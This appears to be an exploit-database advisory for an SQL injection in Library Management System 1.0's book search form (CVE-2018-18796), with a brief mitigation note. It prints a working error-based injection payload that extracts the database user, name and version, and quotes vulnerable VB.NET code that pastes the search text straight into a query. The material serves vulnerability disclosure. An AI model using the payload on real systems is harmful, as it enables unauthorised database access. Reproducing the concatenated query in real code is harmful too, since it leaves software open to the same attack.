Library Management System 1.0 - 'frmListBooks' SQL Injection

vendor:

Library Management System

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Library Management System

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: CVE-2018-18796

CPE: a:sourcecodester:library_management_system:1.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Library Management System 1.0 – ‘frmListBooks’ SQL Injection

Library Management System 1.0 is vulnerable to SQL Injection. This vulnerability exists due to improper sanitization of user-supplied input in the 'frmListBooks' module. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the application's backend database, allowing them to access or modify sensitive data, or even gain access to the underlying system.

Mitigation:

Input validation should be used to detect unauthorized input before it is processed by the application. All input data should be validated and filtered, as appropriate, before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: Library Management System 1.0 - 'frmListBooks' SQL Injection
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/librarymanagementsystem.zip
# Version: 1.0
# Category: Windows
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18796

# POC: 
# 1)
# textSearch System.Windows.Forms.TextBox / [SQL]
# 
# %' And (SElecT 112 FRom(SELECT CoUNT(*),conCAT((SELecT (ELT(112=112,1))),CONCAT_WS(0x203a20,USEr(),DATABASE(),VERsiON()),FLOOR(RAnD(0)*2))x FRoM INFORmaTION_SCHeMA.PLuGINS GRoUP BY x)a) AnD'%'='
# 
# https://1.bp.blogspot.com/-8FBYHFTLhhQ/W9YnCQg0nZI/AAAAAAAAENM/St0sn1IYjDs5kTjvYQNtT_mBmOEv-RaIgCLcBGAs/s1600/sql1.png
# 
#[PATH]/forms/frmListofBooks.vb
#...

Public Class frmListBooks

     Private Sub frmListBooks_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
         sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
         ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId` "
         reloadDtg(sql, dtgList)
     End Sub
 
     Private Sub txtSerach_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
         sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
          ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId`  AND (`BookTitle` Like '%" & txtSearch.Text & "%' OR `Author` Like '%" & txtSearch.Text & "%' OR `AccessionNo` Like '%" & txtSearch.Text & "%')"
         reloadDtg(sql, dtgList)
     End Sub
 
     Private Sub btnAdd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAdd.Click
         Try
             If dtgList.CurrentRow.Cells(10).Value = "Available" Then
                 frmBorrow.txtAccesionNumBorrow.Text = dtgList.CurrentRow.Cells(0).Value
                 Me.Close()
             Else
                 MsgBox("The book is already borrowed.", MsgBoxStyle.Exclamation)
 
             End If
         Catch ex As Exception
 
         End Try
 
     End Sub
 
     Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
         Me.Close()
     End Sub
 End Class